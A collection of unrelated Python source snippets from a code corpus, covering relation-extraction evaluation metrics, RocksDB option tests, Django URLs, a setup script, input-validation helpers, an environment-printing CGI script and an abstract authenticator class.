"token2ids": batch[0],
"pos1s": batch[1],
"pos2s": batch[2],
"mask": batch[3],
"scopes": raw_batch[8],
"is_training": False,
"rel_labels": rel_labels,
}
else:
raise NotImplementedError
instance_ids.extend(instance_id)
bag_ids.extend(bag_id)
out = model(**inputs)
loss = criterion(out, rel_labels)
eval_loss += loss.item()
nb_eval_steps += 1
_, pred = torch.max(out, dim=1) # replace softmax with max function, same results
pred = pred.cpu().numpy().reshape((-1, 1))
rel_labels = rel_labels.cpu().numpy().reshape((-1, 1))
bag_labels = bag_labels.cpu().numpy().reshape((-1, 1))
for x in batch[0].cpu().numpy():
tokens.append(" ".join([processor.id2word[y] for y in x.tolist()]))
if config.task_name == 'sent' or (config.task_name == 'bag' \
and '_one' in config.model_name):
softmax_out = torch.softmax(out.cpu().detach(), dim=-1)
else:
softmax_out = out.cpu().detach() # reference from opennre
outs.append(softmax_out.numpy())
preds.append(pred)
labels.append(rel_labels)
r"""opennre"""
for i in range(softmax_out.size(0)):
for relid in range(processor.class_num):
if processor.id2rel[relid] != 'NA':
pred_ins = {
'label': int(rel_labels[i].item() == relid),
'score': softmax_out[i][relid].item(),
'pred_label': relid
}
if rel_labels[i].item() == relid:
if bag_labels[i] == 1:
pred_ins.update({"b_label": 1})
elif bag_labels[i] == 0:
pred_ins.update({"b_label": 0})
pred_result.append(pred_ins)
r"""end of opennre"""
eval_loss = eval_loss / nb_eval_steps
outs = np.concatenate(outs, axis=0).astype(np.float32)
preds = np.concatenate(preds, axis=0).reshape(-1).astype(np.int64)
labels = np.concatenate(labels, axis=0).reshape(-1).astype(np.int64)
id2rel = processor.id2rel
ids = list(range(len(id2rel)))
target_names = [id2rel[ind] for ind in ids]
results = compute_metrics_nyth(labels, preds, ids, target_names)
"""Precision-Recall Curve (Ours)"""
probs = torch.tensor(outs)
# just take the probs in the max position
thresholds, indices = probs[:,1:].max(dim=1)
indices += 1
ppp, rrr, _ = metrics.precision_recall_curve(labels==indices.cpu().detach().numpy(), thresholds)
with open(os.path.join(eval_output_dir, 'prc_skprc_mine.json'), 'wt', encoding='utf-8') as fout:
json.dump({'precision': ppp.tolist(), 'recall': rrr.tolist()}, fout, ensure_ascii=False)
thresholds = thresholds.numpy()
indices = indices.numpy()
th_objs = list()
for th, lb, truth in zip(thresholds, indices, labels):
th_objs.append(Threshold(th, lb, truth))
th_list_sorted = sorted(th_objs, reverse=True)
tot_len = len(thresholds)
correct = 0
ps = list()
rs = list()
ths = list()
for ind, th in enumerate(th_list_sorted):
correct += th.flag
ps.append(float(correct)/(ind + 1))
rs.append(float(correct)/tot_len)
ths.append(float(th.th))
with open(os.path.join(eval_output_dir, "prc.json"), 'wt', encoding='utf-8') as fout:
json.dump({
"precision": ps,
"recall": rs,
"threshold": ths,
}, fout, ensure_ascii=False)
results['auc'] = metrics.auc(rs, ps)
r"""opennre"""
sorted_pred_result = sorted(pred_result, key=lambda x: x['score'], reverse=True)
prec = []
rec = []
correct = 0
# import ipdb; ipdb.set_trace()
tot_count_flags = labels.copy()
tot_count_flags[tot_count_flags > 0] = 1
tot_count = int(tot_count_flags.sum())
# take `all` non-na probs
correct_k_with_rel = {"k": list(), "covered_rel": list()}
correct_covered_rel = set()
all_k_with_rel = {"k": list(), "covered_rel": list()}
all_covered_rel = set()
for i, item in enumerate(sorted_pred_result):
correct += item['label']
prec.append(float(correct) / float(i + 1))
rec.append(float(correct) / float(tot_count))
if item['label'] > 0:
correct_covered_rel.add(item['pred_label'])
correct_k_with_rel['k'].append(i + 1)
correct_k_with_rel['covered_rel'].append(len(correct_covered_rel))
all_covered_rel.add(item['pred_label'])
all_k_with_rel['k'].append(i + 1)
all_k_with_rel['covered_rel'].append(len(all_covered_rel))
non_na_auc = metrics.auc(x=rec, y=prec)
np_prec = np.array(prec)
np_rec = np.array(rec)
with open(os.path.join(eval_output_dir, "prc_opennre.json"), 'wt', encoding='utf-8') as fout:
json.dump({
"precision": prec,
"recall": rec,
}, fout, ensure_ascii=False)
with open(os.path.join(eval_output_dir, "k_covered_rel.json"), 'wt', encoding='utf-8') as fout:
json.dump({
"correct": correct_k_with_rel,
"all": all_k_with_rel,
}, fout, ensure_ascii=False)
max_f1 = (2 * np_prec * np_rec / (np_prec + np_rec + 1e-20)).max()
mean_prec = np_prec.mean()
results['non_na_auc'] = non_na_auc
results['max_f1'] = max_f1
results['mean_prec'] = mean_prec
r"""end of opennre"""
# -------------------------------------------------------------------------------------------------
if dataset_name == 'test' and config.task_name == "bag":
"""opennre for bag_labels"""
b_pred_result = list(filter(lambda x: "b_label" in x, pred_result))
b_sorted_pred_result = sorted(b_pred_result, key=lambda x: x['score'], reverse=True)
b_prec = []
b_rec = []
b_correct = 0
b_tot_count = sum([x['b_label'] for x in b_sorted_pred_result])
# take `all` non-na probs
for i, item in enumerate(b_sorted_pred_result):
b_correct += item['b_label']
b_prec.append(float(b_correct) / float(i + 1))
b_rec.append(float(b_correct) / float(b_tot_count))
if i + 1 in [50, 100, 200, 300, 400, 500, 1000, 2000]:
results[f'b_P@{i + 1}'] = float(b_correct) / float(i + 1)
b_non_na_auc = metrics.auc(x=b_rec, y=b_prec)
np_b_prec = np.array(b_prec)
np_b_rec = np.array(b_rec)
with open(os.path.join(eval_output_dir, "b_prc_opennre.json"), 'wt', encoding='utf-8') as fout:
json.dump({
"precision": b_prec,
"recall": b_rec,
}, fout, ensure_ascii=False)
b_max_f1 = (2 * np_b_prec * np_b_rec / (np_b_prec + np_b_rec + 1e-20)).max()
b_mean_prec = np_b_prec.mean()
results['b_non_na_auc'] = b_non_na_auc
results['b_max_f1'] = b_max_f1
results['b_mean_prec'] = b_mean_prec
"""end of opennre for bag_labels"""
# -------------------------------------------------------------------------------------------------
with open(os.path.join(eval_output_dir, 'eval_mc.txt'), 'wt', encoding='utf-8') as fin:
for ins_id, bag_id, l, t, p in zip(instance_ids, bag_ids, labels, tokens, preds):
rel2results = OrderedDict()
for rel in processor.rel2id:
if rel != 'NA':
if rel == processor.id2rel[p]:
rel2results[rel] = True
else:
rel2results[rel] = False
l = processor.id2rel[l]
p = processor.id2rel[p]
result = OrderedDict()
result["instance_id"] = ins_id
result["bag_id"] = bag_id
result["result"] = str(l==p)
result["label"] = l
result["pred"] = p
result["tokens"] = t
result["rel2result"] = rel2results
fin.write('{}\n'.format(json.dumps(result)))
ds_p, ds_r, ds_f1 = compute_dsgt(labels, preds, processor.rel2id, verbose=False)
results.update({"dsgt_p": ds_p, "dsgt_r": ds_r, "dsgt_f1": ds_f1})
if dataset_name == 'test':
idname = "bag_id" if config.task_name == "bag" else "instance_id"
id2results = dict()
with open(os.path.join(eval_output_dir, 'eval_mc.txt'), 'r', encoding='utf-8') as fin:
for line in fin:
ins = json.loads(line)
id2results[ins[idname]] = ins
ma_p, ma_r, ma_f1 = compute_magt(labels, preds, config.task_name,
processor.rel2id, processor.test_dataset.data, id2results, verbose=False)
results.update({"magt_p": ma_p, "magt_r": ma_r, "magt_f1": ma_f1})
logger.info("***** {} Eval results {} *****".format(dataset_name, prefix))
for key in sorted(results.keys()):
logger.info(" %s = %s", key, str(results[key]))
return results, eval_loss, preds, labels, outs
def evaluate_crcnn(model, criterion, logger, processor, config, dataset_name, prefix=""):
r"""evaluate the """
eval_output_dir = os.path.join(config.output_dir, "eval")
if not os.path.exists(eval_output_dir):
os.makedirs(eval_output_dir)
number_of_total_examples = {
'train': processor.num_train_examples,
'dev': processor.num_dev_examples,
'test': processor.num_test_examples,
}
logger.info(f"***** Running evaluation {prefix} *****")
logger.info(f" Num examples = {number_of_total_examples[dataset_name]}")
results = dict()
eval_loss = 0.0
nb_eval_steps = 0
preds = list()
labels = list()
outs = list()
tokens = list()
instance_ids = list()
bag_ids = list()
data_loaders = {
"train": processor.train_loader,
"dev": processor.dev_loader,
"test": processor.test_loader
}
data_loader = data_loaders[dataset_name]
with torch.no_grad():
model.eval()
for raw_batch in tqdm(data_loader, desc="Evaluating", ncols=60):
batch = tuple(t.to(config.device) for t in raw_batch[:-2])
inputs = {
"token2ids": batch[0],
"pos1s": batch[1],
"pos2s": batch[2],
"mask": batch[3],
}
rel_labels = batch[4]
bag_labels = batch[5]
instance_id = raw_batch[6]
bag_id = raw_batch[7]
instance_ids.extend(instance_id)
bag_ids.extend(bag_id)
out = model(**inputs)
loss = criterion(out, rel_labels)
eval_loss += loss.item()
nb_eval_steps += 1
scores, pred = torch.max(out[:, 1:], dim=1)
pred = pred + 1
scores = scores.cpu().numpy().reshape((-1, 1))
pred = pred.cpu().numpy().reshape((-1, 1))
for i in range(pred.shape[0]):
if scores[i][0] < 0:
pred[i][0] = 0
rel_labels = rel_labels.cpu().numpy().reshape((-1, 1))
for x in batch[0].cpu().numpy():
tokens.append(" ".join([processor.id2word[y] for y in x.tolist()]))
outs.append(out.detach().cpu().numpy())
preds.append(pred)
labels.append(rel_labels)
eval_loss = eval_loss / nb_eval_steps
outs = np.concatenate(outs, axis=0).astype(np.float32)
preds = np.concatenate(preds, axis=0).reshape(-1).astype(np.int64)
labels = np.concatenate(labels, axis=0).reshape(-1).astype(np.int64)
id2rel = processor.id2rel
ids = list(range(len(id2rel)))
target_names = [id2rel[ind] for ind in ids]
results = compute_metrics_nyth(labels, preds, ids, target_names)
with open(os.path.join(eval_output_dir, 'eval_mc.txt'), 'wt', encoding='utf-8') as fin:
for ins_id, bag_id, l, t, p in zip(instance_ids, bag_ids, labels, tokens, preds):
rel2results = OrderedDict()
for rel in processor.rel2id:
if rel != 'NA':
if rel == processor.id2rel[p]:
rel2results[rel] = True
else:
rel2results[rel] = False
l = processor.id2rel[l]
p = processor.id2rel[p]
result = OrderedDict()
result["instance_id"] = ins_id
result["bag_id"] = bag_id
result["result"] = str(l==p)
result["label"] = l
result["pred"] = p
result["tokens"] = t
result["rel2result"] = rel2results
fin.write('{}\n'.format(json.dumps(result)))
ds_p, ds_r, ds_f1 = compute_dsgt(labels, preds, processor.rel2id, verbose=False)
results.update({"dsgt_p": ds_p, "dsgt_r": ds_r, "dsgt_f1": ds_f1})
if dataset_name == 'test':
id2results = dict()
with open(os.path.join(eval_output_dir, 'eval_mc.txt'), 'r', encoding='utf-8') as fin:
for line in fin:
ins = json.loads(line)
id2results[ins['instance_id']] = ins
ma_p, ma_r, ma_f1 = compute_magt(labels, preds, config.task_name,
processor.rel2id, processor.test_dataset.data, id2results, verbose=False)
results.update({"magt_p": ma_p, "magt_r": ma_r, "magt_f1": ma_f1})
logger.info("***** {} Eval results {} *****".format(dataset_name, prefix))
for key in sorted(results.keys()):
logger.info(" %s = %s", key, str(results[key]))
return results, eval_loss, preds, labels, outs
def evaluate_bag2sent(model, criterion, logger, processor, config, dataset_name, prefix=""):
r"""evaluate the """
eval_output_dir = os.path.join(config.output_dir, "eval")
if not os.path.exists(eval_output_dir):
os.makedirs(eval_output_dir)
logger.info(f"***** Running evaluation {prefix} *****")
logger.info(f" Num examples = {processor.num_test_examples}")
results = dict()
eval_loss = 0.0
nb_eval_steps = 0
preds = list()
labels = list()
outs = list()
tokens = list()
instance_ids = list()
bag_ids = list()
data_loaders = {
"test": processor.test_loader
}
data_loader = data_loaders[dataset_name]
with torch.no_grad():
r"""opennre"""
pred_result = list()
r"""end of opennre"""
for raw_batch in tqdm(data_loader, desc="Evaluating", ncols=60):
model.eval()
if config.task_name == 'bag2sent':
batch = tuple(t.to(config.device) for t in raw_batch[:-3])
rel_labels = batch[4]
bag_labels = batch[5]
instance_id = raw_batch[6]
bag_id = raw_batch[7]
inputs = {
"token2ids": batch[0],
"pos1s": batch[1],
"pos2s": batch[2],
"mask": batch[3],
"scopes": raw_batch[8],
"is_training": False,
"rel_labels": rel_labels,
}
instance_ids.extend(instance_id)
bag_ids.extend(bag_id)
else:
raise NotImplementedError
out = model(**inputs)
loss = criterion(out, rel_labels)
eval_loss += loss.item()
nb_eval_steps += 1
_, pred = torch.max(out, dim=1) # replace softmax with max function, same results
pred = pred.cpu().numpy().reshape((-1, 1))
rel_labels = rel_labels.cpu().numpy().reshape((-1, 1))
for x in batch[0].cpu().numpy():
tokens.append(" ".join([processor.id2word[y] for y in x.tolist()]))
outs.append(out.detach().cpu().numpy())
preds.append(pred)
labels.append(rel_labels)
r"""opennre"""
for i in range(out.size(0)):
for relid in range(processor.class_num):
if processor.id2rel[relid] != 'NA':
pred_result.append({
'label': int(rel_labels[i].item() == relid),
'score': out[i][relid].item()
})
r"""end of opennre"""
eval_loss = eval_loss / nb_eval_steps
outs = np.concatenate(outs, axis=0).astype(np.float32)
preds = np.concatenate(preds, axis=0).reshape(-1).astype(np.int64)
labels = np.concatenate(labels, axis=0).reshape(-1).astype(np.int64)
id2rel = processor.id2rel
ids = list(range(len(id2rel)))
target_names = [id2rel[ind] for ind in ids]
results = compute_metrics_nyth(labels, preds, ids, target_names)
"""Precision-Recall Curve"""
probs = torch.tensor(outs)
thresholds, indices = probs[:,1:].max(dim=1)
indices += 1
thresholds, indices = probs.max(dim=1)
thresholds = thresholds.numpy()
indices = indices.numpy()
th_objs = list()
for th, lb, truth in zip(thresholds, indices, labels):
th_objs.append(Threshold(th, lb, truth))
th_list_sorted = sorted(th_objs, reverse=True)
tot_len = len(thresholds)
correct = 0
ps = list()
rs = list()
ths = list()
for ind, th in enumerate(th_list_sorted):
correct += th.flag
ps.append(float(correct)/(ind + 1))
rs.append(float(correct)/tot_len)
ths.append(float(th.th))
with open(os.path.join(eval_output_dir, "prc_bag2sent.json"), 'wt', encoding='utf-8') as fout:
json.dump({
"precision": ps,
"recall": rs,
"threshold": ths,
}, fout, ensure_ascii=False)
results['auc'] = metrics.auc(rs, ps)
r"""opennre"""
sorted_pred_result = sorted(pred_result, key=lambda x: x['score'], reverse=True)
prec = []
rec = []
correct = 0
total = processor.num_test_examples
for i, item in enumerate(sorted_pred_result):
correct += item['label']
prec.append(float(correct) / float(i + 1))
rec.append(float(correct) / float(total))
non_na_auc = metrics.auc(x=rec, y=prec)
np_prec = np.array(prec)
np_rec = np.array(rec)
max_f1 = (2 * np_prec * np_rec / (np_prec + np_rec + 1e-20)).max()
mean_prec = np_prec.mean()
results['non_na_auc'] = non_na_auc
results['max_f1'] = max_f1
results['mean_prec'] = mean_prec
r"""end of opennre"""
with open(os.path.join(eval_output_dir, 'eval_mc_bag2sent.txt'), 'wt', encoding='utf-8') as fin:
for ins_id, bag_id, l, t, p in zip(instance_ids, bag_ids, labels, tokens, preds):
rel2results = OrderedDict()
for rel in processor.rel2id:
if rel != 'NA':
if rel == processor.id2rel[p]:
rel2results[rel] = True
else:
rel2results[rel] = False
l = processor.id2rel[l]
p = processor.id2rel[p]
result = OrderedDict()
result["instance_id"] = ins_id
result["bag_id"] = bag_id
result["result"] = str(l==p)
result["label"] = l
result["pred"] = p
result["tokens"] = t
result["rel2result"] = rel2results
fin.write('{}\n'.format(json.dumps(result)))
ds_p, ds_r, ds_f1 = compute_dsgt(labels, preds, processor.rel2id, verbose=False)
results.update({"dsgt_p": ds_p, "dsgt_r": ds_r, "dsgt_f1": ds_f1})
if dataset_name == "test":
id2results = dict()
with open(os.path.join(eval_output_dir, 'eval_mc_bag2sent.txt'), 'r', encoding='utf-8') as fin:
for line in fin:
ins = json.loads(line)
id2results[ins['instance_id']] = ins
ma_p, ma_r, ma_f1 = compute_magt(labels, preds, "bag2sent",
processor.rel2id, processor.test_dataset.data,
id2results, verbose=False)
results.update({"magt_p": ma_p, "magt_r": ma_r, "magt_f1": ma_f1})
logger.info("***** {} Eval results {} *****".format(dataset_name, prefix))
for key in sorted(results.keys()):
logger.info(" %s = %s", key, str(results[key]))
return results, eval_loss, preds, labels, outs
def compute_dsgt(labels, preds, rel2id, verbose=True):
ids = list(range(0, len(rel2id)))
id2rel = {val: key for key, val in rel2id.items()}
target_names = [id2rel[x] for x in ids]
report = metrics.classification_report(labels, preds,
digits=4, labels=ids,
target_names=target_names, output_dict=True)
rels = set(target_names)
f1s = list()
ps = list()
rs = list()
for key, val in report.items():
if key in rels and key != 'NA':
ps.append(val['precision'])
rs.append(val['recall'])
f1s.append(val['f1-score'])
non_na_macro_precision = sum(ps)/len(ps)
non_na_macro_recall = sum(rs)/len(rs)
non_na_macro_f1 = sum(f1s)/len(f1s)
if verbose:
print("DSGT Macro Precision: {:.3f}".format(non_na_macro_precision*100))
print("DSGT Macro Recall: {:.3f}".format(non_na_macro_recall*100))
print("DSGT Macro F1: {:.3f}".format(non_na_macro_f1*100))
return non_na_macro_precision, non_na_macro_recall, non_na_macro_f1
def compute_magt(labels, preds, track, rel2id, test, id2results, verbose=True):
id_names = {
"sent2sent": "instance_id",
"sent": "instance_id",
"bag2sent": "instance_id",
"bag2bag": "bag_id",
"bag": "bag_id",
}
id_name = id_names[track]
# initialization
id2ins = dict()
rel2ids = dict()
rel2yes_ids = dict()
for rel in rel2id:
if rel != 'NA':
rel2ids[rel] = list()
rel2yes_ids[rel] = list()
for ins in test:
# create index
id2ins[ins[id_name]] = ins
rel2ids[ins['relation']].append(ins[id_name])
if ins['bag_label'] == 'yes':
rel2yes_ids[ins['relation']].append(ins[id_name])
# without yes instances from other relations
stat_results = dict()
for rel in rel2id:
if rel != 'NA':
stat_results[rel] = dict(preds=list(), labels=list())
bag_ids = set()
for ins in test:
if track in {"bag", "bag2bag"}:
if ins["bag_id"] not in bag_ids:
bag_ids.add(ins["bag_id"])
else:
continue
if ins['bag_label'] == 'yes':
stat_results[ins['relation']]['labels'].append(1)
else:
stat_results[ins['relation']]['labels'].append(0)
stat_results[ins['relation']]['preds'].append(int(id2results[ins[id_name]]['rel2result'][ins['relation']]))
for rel in stat_results:
assert len(stat_results[rel]['preds']) == len(stat_results[rel]['labels'])
rel2f1s = dict()
for rel in stat_results:
rel2f1s[rel] = dict(precision=0.0, recall=0.0, f1_score=0.0)
for rel in stat_results:
rel2f1s[rel]['f1_score'] = metrics.f1_score(stat_results[rel]['labels'], stat_results[rel]['preds'])
rel2f1s[rel]['precision'] = metrics.precision_score(stat_results[rel]['labels'], stat_results[rel]['preds'])
rel2f1s[rel]['recall'] = metrics.recall_score(stat_results[rel]['labels'], stat_results[rel]['preds'])
precisions = [x['precision'] for x in rel2f1s.values()]
macro_precision = sum(precisions)/len(precisions)
recalls = [x['recall'] for x in rel2f1s.values()]
macro_recall = sum(recalls)/len(recalls)
f1s = [x['f1_score'] for x in rel2f1s.values()]
macro_f1 = sum(f1s) / len(f1s)
if verbose:
print("MAGT Macro Precision: {:.3f}".format(macro_precision*100))
print("MAGT Macro Recall: {:.3f}".format(macro_recall*100))
print("MAGT Macro F1: {:.3f}".format(macro_f1*100))
return macro_precision, macro_recall, macro_f1
if __name__ == "__main__":
arg_parser = argparse.ArgumentParser(description="Evaluation on NYT-H")
arg_parser.add_argument("-k", "--track", type=str, required=True,
choices=["sent2sent", "bag2sent", "bag2bag"],
help="Evaluation Track")
arg_parser.add_argument("-r", "--rel2id", type=str, required=True,
help="filepath to rel2id.json file")
arg_parser.add_argument("-t", "--test", type=str, required=True,
help="filepath to test.json file")
arg_parser.add_argument("-p", "--pred", type=str, required=True,
help="filepath to prediction results")
args = arg_parser.parse_args()
with open(args.rel2id, 'r', encoding='utf-8') as fin:
rel2id = json.load(fin)
test = load_line_json(args.test)
pred_results = load_line_json(args.pred)
track = args.track
track_id_name = {
"bag2bag": "bag_id",
"bag2sent": "instance_id",
"sent2sent": "instance_id"
}[track]
id2test = {}
for ins in test:
id2test[ins[track_id_name]] = ins
id2results = dict()
labels = list()
preds = list()
for ins in pred_results:
rel2result = {}
for rel in rel2id:
rel2result[rel] = False
rel2result[ins['pred']] = True
id2results[ins[track_id_name]] = {track_id_name: ins[track_id_name], "rel2result": rel2result}
labels.append(rel2id[id2test[ins[track_id_name]]["relation"]])
preds.append(rel2id[ins['pred']])
print(f"----------- {track} Track Evaluation -----------")
ds_p, ds_r, ds_f1 = compute_dsgt(labels, preds, rel2id, verbose=True)
ma_p, ma_r, ma_f1 = compute_magt(labels, preds, track, rel2id, test, id2results, verbose=True)
| StarcoderdataPython |
6564242 | import warnings
class IncorrectGeometryTypeException(Exception):
"""
The input json file must be a multipoint geometry type, in case the file do not accomplish with the geometry type
then the application throw this exception.
"""
def __init__(self, message):
super(IncorrectGeometryTypeException, self).__init__(message)
class NotURLDefinedException(Exception):
"""
In case the arguments do not have an URL defined,
the application throw this exception
"""
pass
class WFSNotDefinedException(Exception):
"""
The exception is thrown if there is not any WFS service defined to retrieve the features.
"""
pass
class TransportModeNotDefinedException(Exception):
"""
The exception is thrown if there is not any Transport Mode defined/selected to retrieve the features.
"""
pass
class ImpedanceAttributeNotDefinedException(Exception):
"""
Thrown when the impedance argument do not match with the available impedance values
"""
def __init__(self, message):
super(ImpedanceAttributeNotDefinedException, self).__init__(message)
class NotParameterGivenException(Exception):
"""
Thrown when some paramenters have not been given.
"""
def __init__(self, message):
super(NotParameterGivenException, self).__init__(message)
def deprecated(func):
"""This is a decorator which can be used to mark functions
as deprecated. It will result in a warning being emmitted
when the function is used.
Taken from http://code.activestate.com/recipes/391367-deprecated/
"""
def newFunc(*args, **kwargs):
warnings.warn("Call to deprecated function %s." % func.__name__,
category=DeprecationWarning,
stacklevel=2)
return func(*args, **kwargs)
newFunc.__name__ = func.__name__
newFunc.__doc__ = func.__doc__
newFunc.__dict__.update(func.__dict__)
return newFunc
| StarcoderdataPython |
6442562 | import unittest
import rocksdb
class TestFilterPolicy(rocksdb.interfaces.FilterPolicy):
def create_filter(self, keys):
return b'nix'
def key_may_match(self, key, fil):
return True
def name(self):
return b'testfilter'
class TestMergeOperator(rocksdb.interfaces.MergeOperator):
def full_merge(self, *args, **kwargs):
return (False, None)
def partial_merge(self, *args, **kwargs):
return (False, None)
def name(self):
return b'testmergeop'
class TestOptions(unittest.TestCase):
# def test_default_merge_operator(self):
# opts = rocksdb.Options()
# self.assertEqual(True, opts.paranoid_checks)
# opts.paranoid_checks = False
# self.assertEqual(False, opts.paranoid_checks)
# self.assertIsNone(opts.merge_operator)
# opts.merge_operator = "uint64add"
# self.assertIsNotNone(opts.merge_operator)
# self.assertEqual(opts.merge_operator, "uint64add")
# with self.assertRaises(TypeError):
# opts.merge_operator = "not an operator"
def test_compaction_pri(self):
opts = rocksdb.Options()
# default compaction_pri
self.assertEqual(opts.compaction_pri, rocksdb.CompactionPri.by_compensated_size)
opts.compaction_pri = rocksdb.CompactionPri.by_compensated_size
self.assertEqual(opts.compaction_pri, rocksdb.CompactionPri.by_compensated_size)
opts.compaction_pri = rocksdb.CompactionPri.oldest_largest_seq_first
self.assertEqual(opts.compaction_pri, rocksdb.CompactionPri.oldest_largest_seq_first)
opts.compaction_pri = rocksdb.CompactionPri.min_overlapping_ratio
self.assertEqual(opts.compaction_pri, rocksdb.CompactionPri.min_overlapping_ratio)
def test_enable_write_thread_adaptive_yield(self):
opts = rocksdb.Options()
self.assertEqual(opts.enable_write_thread_adaptive_yield, True)
opts.enable_write_thread_adaptive_yield = False
self.assertEqual(opts.enable_write_thread_adaptive_yield, False)
def test_allow_concurrent_memtable_write(self):
opts = rocksdb.Options()
self.assertEqual(opts.allow_concurrent_memtable_write, True)
opts.allow_concurrent_memtable_write = False
self.assertEqual(opts.allow_concurrent_memtable_write, False)
def test_compression_opts(self):
opts = rocksdb.Options()
compression_opts = opts.compression_opts
# default value
self.assertEqual(isinstance(compression_opts, dict), True)
self.assertEqual(compression_opts['window_bits'], -14)
self.assertEqual(compression_opts['level'], -1)
self.assertEqual(compression_opts['strategy'], 0)
self.assertEqual(compression_opts['max_dict_bytes'], 0)
with self.assertRaises(TypeError):
opts.compression_opts = list(1,2)
opts.compression_opts = {'window_bits': 1, 'level': 2, 'strategy': 3, 'max_dict_bytes': 4}
compression_opts = opts.compression_opts
self.assertEqual(compression_opts['window_bits'], 1)
self.assertEqual(compression_opts['level'], 2)
self.assertEqual(compression_opts['strategy'], 3)
self.assertEqual(compression_opts['max_dict_bytes'], 4)
def test_simple(self):
opts = rocksdb.Options()
self.assertEqual(True, opts.paranoid_checks)
opts.paranoid_checks = False
self.assertEqual(False, opts.paranoid_checks)
self.assertIsNone(opts.merge_operator)
ob = TestMergeOperator()
opts.merge_operator = ob
self.assertEqual(opts.merge_operator, ob)
self.assertIsInstance(
opts.comparator,
rocksdb.BytewiseComparator)
self.assertIn(opts.compression,
(rocksdb.CompressionType.no_compression,
rocksdb.CompressionType.snappy_compression))
opts.compression = rocksdb.CompressionType.zstd_compression
self.assertEqual(rocksdb.CompressionType.zstd_compression, opts.compression)
def test_block_options(self):
rocksdb.BlockBasedTableFactory(
block_size=4096,
filter_policy=TestFilterPolicy(),
cache_index_and_filter_blocks=True,
block_cache=rocksdb.LRUCache(100))
def test_unicode_path(self):
name = b'/tmp/M\xc3\xbcnchen'.decode('utf8')
opts = rocksdb.Options()
opts.db_log_dir = name
opts.wal_dir = name
self.assertEqual(name, opts.db_log_dir)
self.assertEqual(name, opts.wal_dir)
def test_table_factory(self):
opts = rocksdb.Options()
self.assertIsNone(opts.table_factory)
opts.table_factory = rocksdb.BlockBasedTableFactory()
opts.table_factory = rocksdb.PlainTableFactory()
def test_compaction_style(self):
opts = rocksdb.Options()
self.assertEqual('level', opts.compaction_style)
opts.compaction_style = 'universal'
self.assertEqual('universal', opts.compaction_style)
opts.compaction_style = 'level'
self.assertEqual('level', opts.compaction_style)
with self.assertRaisesRegexp(Exception, 'Unknown compaction style'):
opts.compaction_style = 'foo'
def test_compaction_opts_universal(self):
opts = rocksdb.Options()
uopts = opts.compaction_options_universal
self.assertEqual(-1, uopts['compression_size_percent'])
self.assertEqual(200, uopts['max_size_amplification_percent'])
self.assertEqual('total_size', uopts['stop_style'])
self.assertEqual(1, uopts['size_ratio'])
self.assertEqual(2, uopts['min_merge_width'])
self.assertGreaterEqual(4294967295, uopts['max_merge_width'])
new_opts = {'stop_style': 'similar_size', 'max_merge_width': 30}
opts.compaction_options_universal = new_opts
uopts = opts.compaction_options_universal
self.assertEqual(-1, uopts['compression_size_percent'])
self.assertEqual(200, uopts['max_size_amplification_percent'])
self.assertEqual('similar_size', uopts['stop_style'])
self.assertEqual(1, uopts['size_ratio'])
self.assertEqual(2, uopts['min_merge_width'])
self.assertEqual(30, uopts['max_merge_width'])
def test_row_cache(self):
opts = rocksdb.Options()
self.assertIsNone(opts.row_cache)
opts.row_cache = cache = rocksdb.LRUCache(2*1024*1024)
self.assertEqual(cache, opts.row_cache)
| StarcoderdataPython |
3539161 | """memcached client, based on mixpanel's memcache_client library
Usage example::
import aiomcache
mc = aiomcache.Client("127.0.0.1", 11211, timeout=1, connect_timeout=5)
yield from mc.set("some_key", "Some value")
value = yield from mc.get("some_key")
yield from mc.delete("another_key")
"""
from .client import Client
from .exceptions import ClientException, ValidationException
__all__ = ('Client', 'ClientException', 'ValidationException')
__version__ = '0.6.0'
| StarcoderdataPython |
3328029 | from django.urls import path
from . import views
urlpatterns = [
path('inject-works', views.inject_works),
path('request-scope-works', views.request_scope_works),
path('request-is-injectable', views.request_is_injectable),
]
| StarcoderdataPython |
6531439 | # StreetSpace
# See full license in LICENSE.txt
from setuptools import setup
# provide a long description using reStructuredText
long_description = """
**StreetSpace** is a package under development for measuring and analysing
streetscapes and street networks.
"""
# list of classifiers from the PyPI classifiers trove
classifiers = ['Development Status :: 2 - Pre-Alpha',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering :: GIS',
'Topic :: Scientific/Engineering :: Information Analysis',
'Natural Language :: English',
'Programming Language :: Python',
'Programming Language :: Python :: 3.6']
with open('requirements.txt') as f:
requirements_lines = f.readlines()
install_requires = [r.strip() for r in requirements_lines]
# now call setup
setup(name='streetspace',
version='0.1.0',
description='Measure and analyse streetscapes and street networks',
long_description=long_description,
classifiers=classifiers,
url='https://github.com/chesterharvey/StreetSpace',
author='<NAME>',
author_email='<EMAIL>',
license='MIT',
platforms='any',
packages=['streetspace'],
install_requires=install_requires) | StarcoderdataPython |
12855727 | def leiaInt(msg):
while True:
try:
i = int(input(msg))
except (ValueError, TypeError):
print('\033[1;3;31mERRO: Por favor, digite um número inteiro válido.\033[0;0;0m')
continue
except (KeyboardInterrupt):
print('\n\033[1;3;33mUsuário preferiu não digitar esse número.\033[0;0;0m\n')
return 0
else:
return i
def leiaFloat(msg):
while True:
try:
r = float(input(msg))
except (TypeError, ValueError):
print('\033[1;3;31mERRO: Por favor, digite um número real válido.\033[0;0;0m')
continue
except (KeyboardInterrupt):
print('\n\033[1;3;33mUsuário preferiu não digitar esse número.\033[0;0;0m\n')
return 0
else:
return r
li = leiaInt('Digite um número inteiro: ')
lr = leiaFloat('Digite um número real: ')
print(f'\033[1;3;34mO valor inteiro foi {li} e o real foi {lr}.\033[0;0;0m') | StarcoderdataPython |
1887563 | <filename>hello.py<gh_stars>0
#!/usr/bin/env python3
import os, json
# printing environment variables
print(os.environ)
# printing as json
json_object = json.dumps(dict(os.environ), indent = 1)
print(json_object)
# print(os.environ["QUERY_STRING"])
# Print query strings if any
# print(os.environ["BROWSER"])
# Print out browser info
if "HTTP_USER_AGENT" in os.environ.keys():
print('-----------------')
print(os.environ["HTTP_USER_AGENT"])
| StarcoderdataPython |
5032036 | from abc import ABC, abstractclassmethod
from ghubunix.models.config import Config
class Authenticator(ABC):
"""Abstract class for Authenticators"""
@abstractclassmethod
def authenticate(self):
"""Perform authentication"""
pass
@abstractclassmethod
def store_token(self):
"""Store Authentication tokens"""
pass
@abstractclassmethod
def retrieve_token(self):
"""Retrieve stored tokens"""
pass
@staticmethod
@abstractclassmethod
def from_config(config: Config):
"""Load authenticator from config"""
pass
@abstractclassmethod
def to_config(self, config: Config):
pass
@abstractclassmethod
